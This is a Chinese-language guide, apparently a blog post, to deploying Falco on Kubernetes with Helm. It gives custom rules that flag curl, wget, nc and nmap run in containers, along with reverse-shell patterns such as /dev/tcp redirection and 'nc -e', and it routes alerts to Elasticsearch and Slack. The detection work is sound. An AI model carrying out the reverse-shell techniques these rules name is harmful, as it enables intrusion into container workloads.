falco安装和配置

falco是CNCF的项目，可以审计k8s容器下发生的动作，包括命令，进程等

部署：

values.yaml文件内容如下：

customRules:
  rulescustom.yaml: |-
    - macro: container
      condition: container.id != host

    - rule: "k8s容器命令审计"
      desc: Detect command executions in specific namespaces
      condition: evt.dir = "<" and evt.type = execve and container and (proc.name=echo or proc.name=wget or proc.name=curl or proc.name=python3 or proc.name=nmap or proc.name=telnet or proc.name=nc) and proc.tty != 0
      output: "风险提示: cmd=%proc.cmdline"
      priority: CRITICAL
      tags: [security, suspicious, command]

    - rule: "反向shell审计"
      desc: "Detect reverse shell patterns like bash -i > /dev/tcp, nc -e, etc."
      condition: evt.type = execve and evt.dir = < and container and ((proc.cmdline contains "/dev/tcp/" and proc.name in (bash, sh)) or (proc.name in (nc, ncat, socat) and proc.cmdline contains "-e") or (proc.name in (python, python3, perl) and proc.cmdline contains "socket"))
      output: "反向Shell，容器有可能主动向外连接提示 cmd=%proc.cmdline"
      priority: CRITICAL
      tags: [attack, reverse-shell]
tty: true
falco:
  http_output:
    enabled: true
  json_output: true
  rules_files:
    - /etc/falco/rules.d

falcosidekick:
  enabled: true
  config:
    elasticsearch:
      hostport: "https://eck-cluster-es-http.elastic-system.svc.cluster.local:9200"
      index: "falco"
      checkcert: false
    slack:
      webhookurl: "https://hooks.slack.com/services/xxx/xxxx/xxxxx"
      minimumpriority: "CRITICAL"
      outputformat: "fields"
      messageformat: ":rotating_light: k8s容器报警"
    k8s:
      node: false
      labels: false

falcoctl:
  artifact:
    install:
      enabled: false
    follow:
      enabled: false

json_include_output_property: true

执行：

helm install --namespace falco falco falcosecurity/falco  -f values.yaml

另一种方式，helm --set的方式直接部署，但是values.yaml文件有自定义的规则，还是需要写到values.yaml里

helm upgrade --namespace falco falco falcosecurity/falco \
    --set tty=true \
    --set falcosidekick.enabled=true \
      --set falcosidekick.config.elasticsearch.hostport="https://eck-cluster-es-http.elastic-system.svc.cluster.local:9200" \
      --set falcosidekick.config.elasticsearch.index="falco" \
      --set falcosidekick.config.elasticsearch.checkcert=false \
    --set falco.http_output.enabled=true \
    --set falco.json_output=true \
    --set json_include_output_property=true \
    --set falcosidekick.config.slack.webhookurl=https://hooks.slack.com/services/xxxx/xxxx/xxxxxx\
      --set falcosidekick.config.slack.minimumpriority=CRITICAL \
    --set "falco.rules_files={/etc/falco/rules.d}" \
        --set falcoctl.artifact.install.enabled=false \
        --set falcoctl.artifact.follow.enabled=false \
    --set "falcosidekick.config.k8s.node=false" \
    --set "falcosidekick.config.k8s.labels=false" \
    --set falcosidekick.config.slack.outputformat="fields" \
    --set falcosidekick.config.slack.messageformat=":rotating_light: k8s容器报警" \
    -f values.yaml